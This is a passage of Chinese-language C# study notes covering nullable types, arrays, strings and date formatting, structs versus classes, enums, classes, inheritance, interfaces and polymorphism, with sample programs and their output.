    {
    int? num1 = null;
    int? num2 = 45;
    double? num3 = new double?();
    double? num4 = 3.14157;

    bool? boolval = new bool?();

    // 显示值

    Console.WriteLine("显示可空类型的值: {0}, {1}, {2}, {3}",
    num1, num2, num3, num4);
    Console.WriteLine("一个可空的布尔值: {0}", boolval);
    Console.ReadLine();

    }
    }
    }
    显示可空类型的值: , 45, , 3.14157
    一个可空的布尔值:

    Null 合并运算符( ?? )

    ​Null 合并运算符用于定义可空类型和引用类型的默认值。Null 合并运算符为类型转换定义了一个预设值,以防可空类型的值为 Null

    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {

    static void Main(string[] args)
    {

    double? num1 = null;
    double? num2 = 3.14157;
    double num3;
    num3 = num1 ?? 5.34; // num1 如果为空值则返回 5.34
    Console.WriteLine("num3 的值: {0}", num3);
    num3 = num2 ?? 5.34;
    Console.WriteLine("num3 的值: {0}", num3);
    Console.ReadLine();

    }
    }
    }
    num3 的值: 5.34
    num3 的值: 3.14157

    ?? 可以理解为三元运算符的简化形式:

    num3 = num1 ?? 5.34;
    num3 = (num1 == null) ? 5.34 : num1;

    C# 数组(Array)

    using System;
    namespace ArrayApplication
    {
    class MyArray
    {
    static void Main(string[] args)
    {
    int[] n = new int[10]; /* n 是一个带有 10 个整数的数组 */
    int i, j;


    /* 初始化数组 n 中的元素 */
    for (i = 0; i < 10; i++)
    {
    n[i] = i + 100;
    }

    /* 输出每个数组元素的值 */
    for (j = 0; j < 10; j++)
    {
    Console.WriteLine("Element[{0}] = {1}", j, n[j]);
    }
    Console.ReadKey();
    }
    }
    }

    ​二维数组:

    using System;

    namespace TwoDimensionalArrayExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 定义一个3行4列的二维数组
    int[,] array = new int[3, 4];

    // 使用嵌套循环来初始化数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    array[i, j] = i * j; // 举例:初始化为行索引乘以列索引
    }
    }

    /* 也可直接初始化:
    int[,] array =
    {
    { 1, 2, 3, 4 },
    { 5, 6, 7, 8 },
    { 9, 10, 11, 12 }
    };
    */

    // 打印数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    Console.Write(array[i, j] + "\t");
    }
    Console.WriteLine();
    }
    }
    }
    }

    C# 多维数组

    ​C# 中二维数组的概念不同于 C/C++、java 等语言中的二维数组,C# 中的二维数组更像是一个矩阵:

    int [,] a = new int [3,4] {
    {0, 1, 2, 3} , /* 初始化索引号为 0 的行 */
    {4, 5, 6, 7} , /* 初始化索引号为 1 的行 */
    {8, 9, 10, 11} /* 初始化索引号为 2 的行 */
    };

    ​这个如果是从其他语言转来学习 C# 可能会和交错数组的概念弄混。

    C# 交错数组

    ​在 C# 中,多维数组(multidimensional arrays)和交错数组(jagged arrays)是两种不同的数组形式,它们有几个重要的区别:

    1. 内存结构
      • 多维数组:多维数组在内存中是连续存储的。例如,一个二维数组 int[,] arr = new int[3, 4]; 在内存中会分配一个连续的块来存储 3 * 4 = 12 个整数。
      • 交错数组:交错数组实际上是数组的数组。它的每个元素都是一个独立的一维数组。这些一维数组在内存中并不一定是连续存储的,每个子数组都可以有不同的长度。例如,int[][] jaggedArray = new int[3][]; jaggedArray 中的每个元素都是一个 int[] 数组,每个 int[] 可以有不同的长度。
    2. 灵活性
      • 多维数组:多维数组在声明时就要确定每一维的大小,并且每一维的大小都是固定的。例如,int[,] arr = new int[3, 4]; 这里的 arr 有三行四列的结构,无法动态改变行或列的数量。
      • 交错数组:交错数组在声明后,每个子数组的长度可以独立设置,因此每个子数组的大小可以是不同的。这使得交错数组更加灵活,可以方便地处理不规则数据结构。
    3. 访问方式
      • 多维数组:访问多维数组的元素时,需要使用逗号分隔每个维度的索引。例如,int[,] arr = new int[3, 4]; int x = arr[1, 2]; 表示访问第二行第三列的元素。
      • 交错数组:访问交错数组的元素时,先通过第一个索引访问特定的子数组,然后再通过第二个索引访问该子数组中的元素。例如,int[][] jaggedArray = new int[3][]; int y = jaggedArray[1][2]; 表示访问第二个子数组的第三个元素。
    4. 用途和性能考虑
      • 多维数组:适合用于表示矩阵和类似的二维数据结构,因为它们提供了快速的访问和连续的内存布局,有利于性能优化。
      • 交错数组:适合处理不规则或动态大小的数据集,因为它们可以根据需要动态调整每个子数组的大小,灵活性更高。

    ​总结来说,多维数组和交错数组在内存结构、灵活性和访问方式上有明显的区别,选择哪种取决于具体的应用场景和数据结构的需求。

    • 交错数组是数组的数组

    • 交错数组是一维数组

    ​您可以声明一个带有 int 值的交错数组 scores,如下所示:

    int [][] scores;

    ​声明一个数组不会在内存中创建数组。创建上面的数组:

    int[][] scores = new int[5][];
    for (int i = 0; i < scores.Length; i++)
    {
    scores[i] = new int[4];
    }

    ​您可以初始化一个交错数组,如下所示:

    int[][] scores = new int[2][]{new int[]{92,93,94},new int[]{85,66,87,88}};

    C# 传递数组给函数

    ​在 C# 中,您可以传递数组作为函数的参数。您可以通过指定不带索引的数组名称来给函数传递一个指向数组的指针。

    ​下面的实例演示了如何传递数组给函数:

    using System;

    namespace ArrayApplication
    {
    class MyArray
    {
    double getAverage(int[] arr, int size)
    {
    int i;
    double avg;
    int sum = 0;

    for (i = 0; i < size; ++i)
    {
    sum += arr[i];
    }

    avg = (double)sum / size;
    return avg;
    }
    static void Main(string[] args)
    {
    MyArray app = new MyArray();
    /* 一个带有 5 个元素的 int 数组 */
    int [] balance = new int[]{1000, 2, 3, 17, 50};
    double avg;

    /* 传递数组的指针作为参数 */
    avg = app.getAverage(balance, 5 ) ;

    /* 输出返回值 */
    Console.WriteLine( "平均值是: {0} ", avg );
    Console.ReadKey();
    }
    }
    }

    C# 字符串(String)

    创建 String 对象

    ​在 C# 中,您可以使用字符数组来表示字符串,但是,更常见的做法是使用 string 关键字来声明一个字符串变量。string 关键字是 System.String 类的别名。

    ​您可以使用以下方法之一来创建 string 对象:

    • 通过给 String 变量指定一个字符串
    • 通过使用 String 类构造函数
    • 通过使用字符串串联运算符( + )
    • 通过检索属性或调用一个返回字符串的方法
    • 通过格式化方法来转换一个值或对象为它的字符串表示形式
    using System;

    namespace StringApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 字符串,字符串连接
    string fname, lname;
    fname = "Rowan";
    lname = "Atkinson";

    string fullname = fname + lname;
    Console.WriteLine("Full Name: {0}", fullname);

    // 通过使用 string 构造函数
    char[] letters = { 'H', 'e', 'l', 'l', 'o' };
    string greetings = new string(letters);
    Console.WriteLine("Greetings: {0}", greetings);

    // 方法返回字符串
    string[] sarray = { "Hello", "From", "Tutorials", "Point" };
    string message = String.Join(" ", sarray);
    Console.WriteLine("Message: {0}", message);

    // 用于转化值的格式化方法
    DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
    string chat = String.Format("Message sent at {0:t} on {0:D}",
    waiting);
    Console.WriteLine("Message: {0}", chat);
    Console.ReadKey();
    }
    }
    }
    Full Name: RowanAtkinson
    Greetings: Hello
    Message: Hello From Tutorials Point
    Message: Message sent at 17:58 on 2012年10月10日

    String 类的属性

    ​Length:在当前的 String 对象中获取字符数。

    String 类的方法

    比较字符串

    String.Compare()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str1 = "This is test";
    string str2 = "This is test";

    if (String.Compare(str1, str2) == 0)
    {
    Console.WriteLine(str1 + " and " + str2 + " are equal.");
    }
    else
    {
    Console.WriteLine(str1 + " and " + str2 + " are not equal.");
    }

    Console.ReadKey();
    }
    }
    }
    This is test and This is test are equal.
    字符串包含字符串

    Contains()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "This is test";
    if (str.Contains("test"))
    {
    Console.WriteLine("The sequence 'test' was found.");
    }
    Console.ReadKey();
    }
    }
    }
    The sequence 'test' was found.
    获取子字符串

    Substring()

    using System;
    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "01234567890123456789";
    Console.WriteLine(str);
    string substr = str.Substring(10);
    Console.WriteLine(substr);
    Console.ReadKey();
    }
    }
    }
    01234567890123456789
    0123456789
    连接字符串

    Join()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string[] starray = new string[]{"Down the way nights are dark",
    "And the sun shines daily on the mountain top",
    "I took a trip on a sailing ship",
    "And when I reached Jamaica",
    "I made a stop"};

    string str = String.Join("\n", starray);
    Console.WriteLine(str);
    Console.ReadKey() ;
    }
    }
    }
    Down the way nights are dark
    And the sun shines daily on the mountain top
    I took a trip on a sailing ship
    And when I reached Jamaica
    I made a stop

    string.Format 格式化日期

    DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
    string.Format("{0:y yy yyy yyyy}",dt); // 17 17 2017 2017
    string.Format("{0:M MM MMM MMMM}", dt);// 4 04 四月 四月
    string.Format("{0:d dd ddd dddd}", dt);// 1 01 周六 星期六
    string.Format("{0:t tt}", dt);// 下 下午
    string.Format("{0:H HH}", dt);// 13 13
    string.Format("{0:h hh}", dt);// 1 01
    string.Format("{0:m mm}", dt);// 16 16
    string.Format("{0:s ss}", dt);// 32 32
    string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt);// 1 1 108 108 108 108 108
    string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt);// 1 10 108 1080 10800 108000 1080000
    string.Format("{0:z zz zzz}", dt);// +8 +08 +08:00

    string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}",dt);  // 2017/04/01 13:16:32.108
    string.Format("{0:yyyy/MM/dd dddd}", dt);      // 2017/04/01 星期六
    string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
    string.Format("{0:yyyyMMdd}", dt);         // 20170401
    string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108

    ​除去 string.Format() 可以对日期进行格式化之外,.ToString() 也可以实现相同的效果:

    DateTime dt = new DateTime(2017,4,1,13,16,32,108);
    dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
    dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
    dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
    dt.ToString("t tt"); // 下 下午
    dt.ToString("H HH"); // 13 13
    dt.ToString("h hh"); // 1 01
    dt.ToString("m mm"); // 16 16
    dt.ToString("s ss"); // 32 32
    dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
    dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
    dt.ToString("z zz zzz"); // +8 +08 +08:00

    dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
    dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
    dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
    dt.ToString("yyyyMMdd"); // 20170401
    dt.ToString("yyyy-MM-dd HH:mm:ss.fff");  // 2017-04-01 13:16:32.108

    C# 结构体(Struct)

    ​在 C# 中,结构体(struct)是一种值类型(value type),用于组织和存储相关数据。

    ​在 C# 中,结构体是值类型数据结构,这样使得一个单一变量可以存储各种数据类型的相关数据。

    using System;
    using System.Text;

    struct Books
    {
    public string title;
    public string author;
    public string subject;
    public int book_id;
    };

    public class testStructure
    {
    public static void Main(string[] args)
    {
    /* 声明 Book1,类型为 Books */
    Books Book1;
    /* 声明 Book2,类型为 Books */
    Books Book2;

    /* book 1 详述 */
    Book1.title = "C Programming";
    Book1.author = "Nuha Ali";
    Book1.subject = "C Programming Tutorial";
    Book1.book_id = 6495407;

    /* book 2 详述 */
    Book2.title = "Telecom Billing";
    Book2.author = "Zara Ali";
    Book2.subject = "Telecom Billing Tutorial";
    Book2.book_id = 6495700;

    /* 打印 Book1 信息 */
    Console.WriteLine("Book 1 title : {0}", Book1.title);
    Console.WriteLine("Book 1 author : {0}", Book1.author);
    Console.WriteLine("Book 1 subject : {0}", Book1.subject);
    Console.WriteLine("Book 1 book_id :{0}", Book1.book_id);

    /* 打印 Book2 信息 */
    Console.WriteLine("Book 2 title : {0}", Book2.title);
    Console.WriteLine("Book 2 author : {0}", Book2.author);
    Console.WriteLine("Book 2 subject : {0}", Book2.subject);
    Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

    Console.ReadKey();

    }
    }
    Book 1 title : C Programming
    Book 1 author : Nuha Ali
    Book 1 subject : C Programming Tutorial
    Book 1 book_id : 6495407
    Book 2 title : Telecom Billing
    Book 2 author : Zara Ali
    Book 2 subject : Telecom Billing Tutorial
    Book 2 book_id : 6495700

    类 vs 结构

    ​类和结构在设计和使用时有不同的考虑因素,类适合表示复杂的对象和行为,支持继承和多态性,而结构则更适合表示轻量级数据和值类型,以提高性能并避免引用的管理开销。

    ​类和结构有以下几个基本的不同点:

    值类型 vs 引用类型:

    • 结构是值类型(Value Type): 结构是值类型,它们在栈上分配内存,而不是在堆上。当将结构实例传递给方法或赋值给另一个变量时,将复制整个结构的内容。
    • 类是引用类型(Reference Type): 类是引用类型,它们在堆上分配内存。当将类实例传递给方法或赋值给另一个变量时,实际上是传递引用(内存地址)而不是整个对象的副本。

    继承和多态性:

    • 结构不能继承: 结构不能继承其他结构或类,也不能作为其他结构或类的基类。
    • 类支持继承: 类支持继承和多态性,可以通过派生新类来扩展现有类的功能。

    默认构造函数:

    • 结构不能有无参数的构造函数: 结构不能包含无参数的构造函数。每个结构都必须有至少一个有参数的构造函数。
    • 类可以有无参数的构造函数: 类可以包含无参数的构造函数,如果没有提供构造函数,系统会提供默认的无参数构造函数。

    赋值行为:

    • 类型为类的变量在赋值时存储的是引用,因此两个变量指向同一个对象。
    • 结构变量在赋值时会复制整个结构,因此每个变量都有自己的独立副本。

    传递方式:

    • 类型为类的对象在方法调用时通过引用传递,这意味着在方法中对对象所做的更改会影响到原始对象。
    • 结构对象通常通过值传递,这意味着传递的是结构的副本,而不是原始结构对象本身。因此,在方法中对结构所做的更改不会影响到原始对象。

    可空性:

    • **结构体是值类型,不能直接设置为 null:**因为 null 是引用类型的默认值,而不是值类型的默认值。如果你需要表示结构体变量的缺失或无效状态,可以使用 Nullable<T> 或称为 T? 的可空类型。
    • 类默认可为 null: 类的实例默认可以为 null,因为它们是引用类型。

    性能和内存分配:

    • 结构通常更轻量: 由于结构是值类型且在栈上分配内存,它们通常比类更轻量,适用于简单的数据表示。
    • 类可能有更多开销: 由于类是引用类型,可能涉及更多的内存开销和管理。

    ​以下实例中,MyStruct 是一个结构,而 MyClass 是一个类。

    ​注释部分演示了结构不能包含无参数的构造函数、不能继承以及结构的实例复制是复制整个结构的内容。与之相反,类可以包含无参数的构造函数,可以继承,并且实例复制是复制引用。

    class 有点像 python,如果要向 struct 一样修改实例不影响其他实例,需要自己在 class 内定义一个类似 .copy() 的函数)

    using System;

    // 结构声明
    struct MyStruct
    {
    public int X;
    public int Y;

    // 结构不能有无参数的构造函数
    // public MyStruct()
    // {
    // }

    // 有参数的构造函数
    // CS0171必须先完全分配字段 'MyStruct.Y' ,然后才能将控件返回给调用方。请考虑更新到语言版本 '11.0' 以自动默认字段
    public MyStruct(int x, int y)
    {
    X = x;
    Y = y;
    }

    // 结构不能继承
    // struct MyDerivedStruct : MyBaseStruct
    // {
    // }
    }

    // 类声明
    class MyClass
    {
    public int X;
    public int Y;

    // 类可以有无参数的构造函数
    public MyClass()
    {
    }

    // 有参数的构造函数
    public MyClass(int x, int y)
    {
    X = x;
    Y = y;
    }

    // 类支持继承
    // class MyDerivedClass : MyBaseClass
    // {
    // }

    public MyClass ShallowCopy()
    {
    return (MyClass)this.MemberwiseClone();
    }
    }

    class Program
    {
    static void Main()
    {
    // 结构是值类型,分配在栈上
    MyStruct structInstance1 = new MyStruct(1, 2);
    MyStruct structInstance2 = structInstance1; // 复制整个结构

    // 类是引用类型,分配在堆上
    MyClass classInstance1 = new MyClass(3, 4);
    MyClass classInstance2 = classInstance1; // 复制引用,指向同一个对象
    MyClass classInstance3 = classInstance1.ShallowCopy(); // 浅拷贝,指向不同对象

    // 修改结构实例不影响其他实例
    structInstance1.X = 5;
    Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

    // 修改类实例会影响其他实例
    classInstance1.X = 6;
    Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
    }
    }
    Struct: 5, 1
    Class: 6, 6, 3

    C# 枚举(Enum)

    ​枚举列表中的每个符号代表一个整数值,一个比它前面的符号大的整数值。默认情况下,第一个枚举符号的值是 0,当然也可以自己设置。

    using System;

    public class EnumTest
    {
    enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

    static void Main()
    {
    Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}", (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
    }
    }
    Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10

    C# 类(Class)

    类的定义

    ​类的定义是以关键字 class 开始,后跟类的名称。类的主体,包含在一对花括号内。下面是类定义的一般形式:

    <access specifier> class  class_name 
    {
    // member variables
    <access specifier> <data type> variable1;
    <access specifier> <data type> variable2;
    ...
    <access specifier> <data type> variableN;
    // member methods
    <access specifier> <return type> method1(parameter_list)
    {
    // method body
    }
    <access specifier> <return type> method2(parameter_list)
    {
    // method body
    }
    ...
    <access specifier> <return type> methodN(parameter_list)
    {
    // method body
    }
    }
    • 访问标识符 <access specifier> 指定了对类及其成员的访问规则。如果没有指定,则使用默认的访问标识符。类的默认访问标识符是 internal,成员的默认访问标识符是 private
    • 数据类型 <data type> 指定了变量的类型,返回类型 <return type> 指定了返回的方法返回的数据类型。
    • 如果要访问类的成员,你要使用点(.)运算符。
    • 点运算符链接了对象的名称和成员的名称。

    成员函数和封装

    ​类的成员函数是一个在类定义中有它的定义或原型的函数,就像其他变量一样。作为类的一个成员,它能在类的任何对象上操作,且能访问该对象的类的所有成员。

    ​成员变量是对象的属性(从设计角度),且它们保持私有来实现封装。这些变量只能使用公共成员函数来访问。

    ​让我们使用上面的概念来设置和获取一个类中不同的类成员的值:

    using System;
    namespace BoxApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度
    public void setLength(double len)
    {
    length = len;
    }

    public void setBreadth(double bre)
    {
    breadth = bre;
    }

    public void setHeight(double hei)
    {
    height = hei;
    }
    public double getVolume()
    {
    return length * breadth * height;
    }
    }
    class Boxtester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    double volume; // 体积


    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    Console.ReadKey();
    }
    }
    }
    Box1 的体积: 210
    Box2 的体积: 1560

    C# 中的构造函数

    ​类的 构造函数 是类的一个特殊的成员函数,当创建类的新对象时执行

    ​构造函数的名称与类的名称完全相同,它没有任何返回类型。

    默认的构造函数没有任何参数。但是如果你需要一个带有参数的构造函数可以有参数,这种构造函数叫做参数化构造函数。(反正跟 C++/Javascript 一样。)

    C# 中的析构函数

    ​类的 析构函数 是类的一个特殊的成员函数,当类的对象超出范围时(之后不再有用,销毁)执行。

    ​析构函数的名称是在类的名称前加上一个波浪形(~)作为前缀,它不返回值,也不带任何参数。

    ​析构函数用于在结束程序(比如关闭文件、释放内存等)之前释放资源。析构函数不能继承或重载。

    C# 类的静态成员

    ​我们可以使用 static 关键字把类成员定义为静态的。当我们声明一个类成员为静态时,意味着无论有多少个类的对象被创建,只会有一个该静态成员的副本

    ​关键字 static 意味着类中只有一个该成员的实例。静态变量用于定义常量,因为它们的值可以通过直接调用类而不需要创建类的实例来获取。静态变量可在成员函数或类的定义外部进行初始化。你也可以在类的定义内部初始化静态变量。

    ​你也可以把一个成员函数声明为 static这样的函数只能访问静态变量。静态函数在对象被创建之前就已经存在。下面的实例演示了静态函数的用法:

    using System;
    namespace StaticVarApplication
    {
    class StaticVar
    {
    public static int num;
    public void count()
    {
    num++;
    }
    public static int getNum()
    {
    return num;
    }
    }
    class StaticTester
    {
    static void Main(string[] args)
    {
    StaticVar s = new StaticVar();
    s.count();
    s.count();
    s.count();
    Console.WriteLine("变量 num: {0}", StaticVar.getNum());
    Console.ReadKey();
    }
    }
    }
    变量 num: 3

    C# 继承

    ​继承是面向对象程序设计中最重要的概念之一。继承允许我们根据一个类来定义另一个类,这使得创建和维护应用程序变得更容易。同时也有利于重用代码和节省开发时间。

    ​当创建一个类时,程序员不需要完全重新编写新的数据成员和成员函数,只需要设计一个新的类,继承了已有的类的成员即可。这个已有的类被称为的基类,这个新的类被称为派生类

    ​继承的思想实现了 属于(IS-A) 关系。例如,哺乳动物 属于(IS-A) 动物,狗 属于(IS-A) 哺乳动物,因此狗 属于(IS-A) 动物。

    基类和派生类

    ​一个类可以继承自另一个类,被称为基类(父类)和派生类(子类)。

    ​C# 不支持类的多重继承,但支持接口的多重继承,一个类可以实现多个接口。

    ​**概括来说:**一个类可以继承多个接口,但只能继承自一个类。

    ​C# 中创建派生类的语法如下:

    <访问修饰符> class <基类>
    {
    ...
    }
    class <派生类> : <基类>
    {
    ...
    }

    ​派生类会继承基类的成员(字段、方法、属性等),除非它们被明确地标记为私有(private)。

    派生类可以通过关键字 base 来调用基类的构造函数和方法。

    基类的初始化

    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("长度: {0}", length);
    Console.WriteLine("宽度: {0}", width);
    Console.WriteLine("面积: {0}", GetArea());
    }
    }//end class Rectangle
    class Tabletop : Rectangle
    {
    private double cost;
    public Tabletop(double l, double w) : base(l, w)
    { }
    public double GetCost()
    {
    double cost;
    cost = GetArea() * 70;
    return cost;
    }
    public void Display()
    {
    base.Display();
    Console.WriteLine("成本: {0}", GetCost());
    }
    }
    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Tabletop t = new Tabletop(4.5, 7.5);
    t.Display();
    Console.ReadLine();
    }
    }
    }
    长度: 4.5
    宽度: 7.5
    面积: 33.75
    成本: 2362.5

    Tabletop 所定义的 Display() 将会覆盖 Rectangle 所定义的 Display(),如果没有 base.Display(); 语句,则 Rectangle.Display() 将不会执行。

    继承接口(Interface Inheritance)

    ​一个接口可以继承自一个或多个其他接口,派生接口继承了基接口的所有成员。

    ​派生接口可以扩展基接口的成员列表,但不能改变它们的访问修饰符。

    using System;

    // 定义一个基接口
    interface IBaseInterface
    {
    void Method1();
    }

    // 定义一个派生接口,继承自基接口
    interface IDerivedInterface : IBaseInterface
    {
    void Method2();
    }

    // 实现派生接口的类
    class MyClass : IDerivedInterface
    {
    public void Method1()
    {
    Console.WriteLine("Method1 implementation");
    }

    public void Method2()
    {
    Console.WriteLine("Method2 implementation");
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建 MyClass 类的实例
    MyClass obj = new MyClass();

    // 调用继承自基接口的方法
    obj.Method1();

    // 调用派生接口新增的方法
    obj.Method2();
    }
    }

    ​接口(interface)与类(class)在面向对象编程中有着明显的区别和用途:

    1. 定义与用途
      • 类(class) 是一种具体的数据结构,用来封装数据和行为(即方法)。类可以实例化为对象,对象具有类定义的属性和方法。
      • 接口(interface) 是一种抽象的数据类型,它定义了一组方法(和常量),但没有实现这些方法的具体代码。接口定义了一个协议或契约,约定了实现类需要提供的方法。
    2. 实现方式
      • 可以包含字段、属性、方法、构造函数等实现代码,它提供了具体的数据和行为。
      • 接口 只能定义方法、属性、事件和索引器的签名,但没有具体的实现。实现接口的类必须提供接口中定义的所有成员的具体实现。
    3. 继承关系
      • 可以继承自其他类,形成类的层次结构。一个类可以继承自另一个类的字段和方法,并且可以重写父类的方法或者增加新的方法。
      • 接口 可以被类实现,一个类可以实现一个或多个接口。接口之间可以进行多重继承,即一个接口可以继承多个其他接口。
    4. 使用场景
      • 适合用于描述具体的对象和实现复杂的行为,它们可以包含状态(字段)和行为(方法)。
      • 接口 适合用于定义对象应该具备的功能,而不关心具体的实现细节。接口可以帮助在不同的类之间建立约定,使得代码更加模块化和可扩展。

    ​总结来说,类是对数据和行为的具体实现,而接口是对功能和行为的抽象描述。在设计和编程中,合理地使用类和接口可以使代码更加灵活、可维护和可扩展。

    using System;

    // 定义一个基接口
    interface IBaseInterface
    {
    void Method1();
    }

    // 定义一个派生接口,继承自基接口(接口一样可以继承)
    interface IDerivedInterface : IBaseInterface
    {
    void Method2();
    }

    // 实现派生接口的类(必须实现,不然编译失败)
    class MyClass : IDerivedInterface
    {
    public void Method1()
    {
    Console.WriteLine("Method1 implementation");
    }

    public void Method2()
    {
    Console.WriteLine("Method2 implementation");
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建 MyClass 类的实例
    MyClass obj = new MyClass();

    // 调用继承自基接口的方法
    obj.Method1();

    // 调用派生接口新增的方法
    obj.Method2();
    }
    }

    C# 多重继承

    ​C++ 里的多重继承:C++(23)——理解多重继承(菱形继承、半圆形继承)、虚基类和虚继承_c++23-CSDN博客

    ​多重继承指的是一个类别可以同时从多于一个父类继承行为与特征的功能。与单一继承相对,单一继承指一个类别只可以继承自一个父类。

    C# 不支持多重继承。但是,您可以使用接口来实现多重继承(C# 不支持继承多个基类,但是可以继承多个接口)。下面的程序演示了这点:

    using System;
    namespace InheritanceApplication
    {
    class Shape
    {
    public void setWidth(int w)
    {
    width = w;
    }
    public void setHeight(int h)
    {
    height = h;
    }
    protected int width;
    protected int height;
    }

    // 基类 PaintCost
    public interface PaintCost
    {
    int getPaintCost(int area);

    }

    // 基类 FlatCost
    public interface FlatCost
    {
    int getFlatCost(int area);

    }
    // 派生类
    class Rectangle : Shape, PaintCost, FlatCost
    {
    public int getArea()
    {
    return (width * height);
    }
    public int getPaintCost(int area)
    {
    return area * 70;
    }
    public int getFlatCost(int area)
    {
    return area * 20;
    }
    }
    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle Rect = new Rectangle();
    int area;
    Rect.setWidth(5);
    Rect.setHeight(7);
    area = Rect.getArea();
    // 打印对象的面积
    Console.WriteLine("总面积: {0}", Rect.getArea());
    Console.WriteLine("油漆总成本: ${0}", Rect.getPaintCost(area));
    Console.WriteLine("工本费: ${0}", Rect.getFlatCost(area));
    Console.ReadKey();
    }
    }
    }
    总面积: 35
    油漆总成本: $2450
    工本费: $700

    C# 多态性

    多态是同一个行为具有多个不同表现形式或形态的能力。

    多态性意味着有多重形式。在面向对象编程范式中,多态性往往表现为"一个接口,多个功能"。

    ​多态性可以是静态的或动态的。在静态多态性中,函数的响应是在编译时发生的。在动态多态性中,函数的响应是在运行时发生的。

    ​在 C# 中,每个类型都是多态的,因为包括用户定义类型在内的所有类型都继承自 Object。

    ​现实中,比如我们按下 F1 键这个动作:

    • 如果当前在 Flash 界面下弹出的就是 AS 3 的帮助文档;

    • 如果当前在 Word 下弹出的就是 Word 帮助;

    • 在 Windows 下弹出的就是 Windows 帮助和支持。

      同一个事件发生在不同的对象上会产生不同的结果。(这就是多态!)

    静态多态性

    在编译时,函数和对象的连接机制被称为早期绑定,也被称为静态绑定。C# 提供了两种技术来实现静态多态性。分别为:

    • 函数重载
    • 运算符重载
    函数重载

    ​您可以在同一个范围内对相同的函数名有多个定义。函数的定义必须彼此不同,可以是参数列表中的参数类型不同,也可以是参数个数不同(总之就是参数定义不同)。不同重载只有返回类型不同的函数声明。

    using System;
    namespace PolymorphismApplication
    {
    public class TestData
    {
    public int Add(int a, int b, int c)
    {
    return a + b + c;
    }
    public int Add(int a, int b)
    {
    return a + b;
    }
    }
    class Program
    {
    static void Main(string[] args)
    {
    TestData dataClass = new TestData();
    int add1 = dataClass.Add(1, 2);
    int add2 = dataClass.Add(1, 2, 3);

    Console.WriteLine("add1 :" + add1);
    Console.WriteLine("add2 :" + add2);
    }
    }
    }

    动态多态性

    ​静态多态性(Static Polymorphism)和动态多态性(Dynamic Polymorphism)是面向对象编程中多态性的两种实现方式,它们之间的主要区别在于如何确定调用的具体方法或函数。

    1. 静态多态性(编译时多态性)
      • 静态多态性是在编译时确定方法的调用,根据编译时的类型信息来决定具体调用哪个方法。
      • 主要实现方式是函数重载(Overloading)和运算符重载(Operator Overloading)。在函数重载中,编译器根据调用时使用的参数类型或数量来选择正确的函数版本。
      • 静态多态性的优势在于效率高,因为在编译时已经确定了调用的具体方法,无需在运行时进行额外的查找或判断。
    2. 动态多态性(运行时多态性)
      • 动态多态性是在运行时根据对象的实际类型来确定方法的调用。
      • 主要实现方式是通过继承和方法重写(Override),以及接口和虚方法的实现。通过继承,子类可以重写父类的方法,在程序运行时根据对象的实际类型调用正确的方法版本。
      • 动态多态性的优势在于灵活性和扩展性,因为它允许在运行时根据实际情况来决定方法的调用,从而支持更加复杂和动态的程序逻辑。

